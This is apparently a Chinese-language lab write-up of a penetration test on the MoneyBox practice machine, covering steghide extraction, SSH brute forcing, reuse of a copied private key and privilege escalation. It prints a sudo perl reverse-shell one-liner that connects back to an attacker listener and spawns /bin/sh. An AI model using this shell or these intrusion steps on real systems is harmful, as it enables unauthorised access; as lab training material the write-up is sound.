MoneyBox靶场渗透测试
- 测试环境
系统:Linux
靶场:MoneyBox
- 测试描述
渗透测试的目的
对MoneyBox靶场进行渗透测试,找到3个flag。
渗透测试时间
2023年10月27日
- 测试流程
进入靶场修改密码以及分配IP
分配IP:dhclient
扫描目录:
访问:
访问该目录:
使用以下命令显示隐藏在文件中的信息。
steghide info trytofind.jpg
提取隐藏的文件:
steghide extract -sf trytofind.jpg
发现需要密码:
输入密码:3xtr4ctd4t4
发现了文件:data.txt
查看data发现renu用户:
尝试SSH登录:需要密码
暴力破解:获得密码
登录成功:ssh renu@192.168.129.128
查看目录:发现flag
发现其他用户:
ls -a 查看所有文件:
查看历史命令:cat .bash_history发现许多的可用命令
进入home/lily,发现flag:
查看公钥:发现lily与renu的公钥相同
将renu的私钥下载下来:scp -r renu@192.168.129.128:/home/renu/.ssh/id_rsa /root/Desktop/
并将两者的权限设置相同:chmod 700 id_rsa
登录:ssh -i id_rsa lily@192.168.129.128
提权root:
查看是否可以sudo反弹:
反弹:
sudo perl -e 'use Socket;$i="192.168.129.129";$p=9999;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
监听:
监听成功,查看id:
进入root,查看文件ls -la:发现root.txt
查看root.txt:发现flag